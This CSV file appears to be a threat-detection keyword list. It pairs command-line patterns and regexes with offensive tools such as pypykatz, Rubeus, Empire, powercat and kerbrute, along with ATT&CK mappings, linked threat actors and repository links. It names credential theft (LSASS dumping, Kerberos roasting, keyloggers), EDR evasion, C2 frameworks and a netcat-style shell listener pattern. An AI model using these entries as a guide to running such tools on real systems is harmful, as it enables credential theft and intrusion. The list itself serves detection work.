"* kerberos ccache list *.ccache*",".{0,1000}\skerberos\sccache\slist\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1868"
"* kerberos ccache loadkirbi *",".{0,1000}\skerberos\sccache\sloadkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1869"
"* kerberos ccache roast *",".{0,1000}\skerberos\sccache\sroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1870"
"* kerberos keytab *.keytab*",".{0,1000}\skerberos\skeytab\s.{0,1000}\.keytab.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1871"
"* kerberos kirbi parse *",".{0,1000}\skerberos\skirbi\sparse\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1872"
"* kerberos spnroast *",".{0,1000}\skerberos\sspnroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1873"
"* kerberos tgt *kerberos+rc4://*:*@*",".{0,1000}\skerberos\stgt\s.{0,1000}kerberos\+rc4\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1874"
"* kerberos.py*",".{0,1000}\skerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1875"
"* kerbrute.py*",".{0,1000}\skerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","1876"
"* --key examples/conspicuous.priv --isconspicuous*",".{0,1000}\s\-\-key\sexamples\/conspicuous\.priv\s\-\-isconspicuous.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1877"
"* --key PPLBlade*",".{0,1000}\s\-\-key\sPPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1878"
"* KeyCredentialLink.ps1*",".{0,1000}\sKeyCredentialLink\.ps1.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","1879"
"* keylogger *",".{0,1000}\skeylogger\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1880"
"* KeyLogger.ahk*",".{0,1000}\sKeyLogger\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1881"
"* --keyword * --check --ocr * --alexa*",".{0,1000}\s\-\-keyword\s.{0,1000}\s\-\-check\s\-\-ocr\s.{0,1000}\s\-\-alexa.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","1882"
"* Killchain.ps1*",".{0,1000}\sKillchain\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","1883"
"* -KillDate *",".{0,1000}\s\-KillDate\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1884"
"* -KillDays *",".{0,1000}\s\-KillDays\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1885"
"* killer.cpp *",".{0,1000}\skiller\.cpp\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","1886"
"* killer.exe*",".{0,1000}\skiller\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","1887"
"* KillEvenlogService.ps1*",".{0,1000}\sKillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","1888"
"* kimi.py *",".{0,1000}\skimi\.py\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","1889"
"* KittyStager*",".{0,1000}\sKittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","1890"
"* klg.ps1 *",".{0,1000}\sklg\.ps1\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1891"
"* klist * /service:*",".{0,1000}\sklist\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1892"
"* knowsmore.cmd.wordlist*",".{0,1000}\sknowsmore\.cmd\.wordlist.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1893"
"* knowsmore.cmdbase*",".{0,1000}\sknowsmore\.cmdbase.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1894"
"* knowsmore.config*",".{0,1000}\sknowsmore\.config.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1895"
"* knowsmore.knowsmore*",".{0,1000}\sknowsmore\.knowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1896"
"* knowsmore.libs.bloodhoundsync*",".{0,1000}\sknowsmore\.libs\.bloodhoundsync.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1897"
"* knowsmore.libs.exporterbase*",".{0,1000}\sknowsmore\.libs\.exporterbase.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1898"
"* knowsmore.libs.ntdsuseraccount*",".{0,1000}\sknowsmore\.libs\.ntdsuseraccount.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1899"
"* knowsmore.module*",".{0,1000}\sknowsmore\.module.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1900"
"* knowsmore.password*",".{0,1000}\sknowsmore\.password.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1901"
"* knowsmore.py*",".{0,1000}\sknowsmore\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1902"
"* knowsmore.util.color*",".{0,1000}\sknowsmore\.util\.color.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1903"
"* knowsmore.util.database*",".{0,1000}\sknowsmore\.util\.database.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1904"
"* knowsmore.util.knowsmoredb*",".{0,1000}\sknowsmore\.util\.knowsmoredb.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1905"
"* knowsmore.util.logger*",".{0,1000}\sknowsmore\.util\.logger.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1906"
"* knowsmore.util.process*",".{0,1000}\sknowsmore\.util\.process.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1907"
"* knowsmore.util.tools*",".{0,1000}\sknowsmore\.util\.tools.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1908"
"* knx-gateway-discover.nse*",".{0,1000}\sknx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1909"
"* knx-gateway-info.nse*",".{0,1000}\sknx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1910"
"* KRB hijacking module *",".{0,1000}\sKRB\shijacking\smodule\s.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","1911"
"* krb5-enum-users.nse*",".{0,1000}\skrb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1912"
"* --krbpass * --krbsalt * -t * --escalate-user *",".{0,1000}\s\-\-krbpass\s.{0,1000}\s\-\-krbsalt\s.{0,1000}\s\-t\s.{0,1000}\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1913"
"* --krbpass *--krbsalt*",".{0,1000}\s\-\-krbpass\s.{0,1000}\-\-krbsalt.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1914"
"* KrbRelay.HiveParser*",".{0,1000}\sKrbRelay\.HiveParser.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","1915"
"* KRBUACBypass*",".{0,1000}\sKRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","1916"
"* -l nmapRssuilt.xml -v*",".{0,1000}\s\-l\snmapRssuilt\.xml\s\-v.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","1917"
"* -l -p * -e cmd -ge*",".{0,1000}\s\-l\s\-p\s.{0,1000}\s\-e\scmd\s\-ge.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","1918"
"* l$a$$Pid *",".{0,1000}\sl\$a\$\$Pid\s.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","1919"
